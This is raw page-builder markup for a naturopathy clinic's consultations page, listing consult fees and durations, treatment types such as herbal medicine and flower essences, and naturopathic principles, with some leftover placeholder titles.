global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\" inline_fonts=\"Montserrat,Playfair Display\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Verde Naturopathy offers both face-to-face and online Zoom consultations.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.9.4\"][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover_enabled=\"on|hover\" icon_color__hover=\"#000000\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Vestibulum ante\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla quis\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Curabitur nulla\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\" sticky_enabled=\"0\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Quisque velit\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Proin eget\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" column_structure=\"1_3,1_3,1_3\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"4_4\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_3\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Initial consult (90 min) - $120\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" title_text=\"Icon\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Return consult (50 min) - $80\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.jpg\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" title_text=\"5-01\" sticky_enabled=\"0\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\" custom_padding=\"||0px|||\" sticky_enabled=\"0\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"1_5\"][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]<ul>\n<li>Stress strategies</li>\n<li>Exercise and movement</li>\n<li>Mindfulness </li>\n<li>Sleep support</li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li>Flower <span style=\"font-family: Montserrat;\">essences</span> </li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.4.8\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Don\'t wait to make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.4.8\" background_color=\"#f6ddd7\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-24.png\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image title_text=\"Icon\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_text=\"View Calendar\" button_alignment=\"center\" _builder_version=\"4.4.8\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" 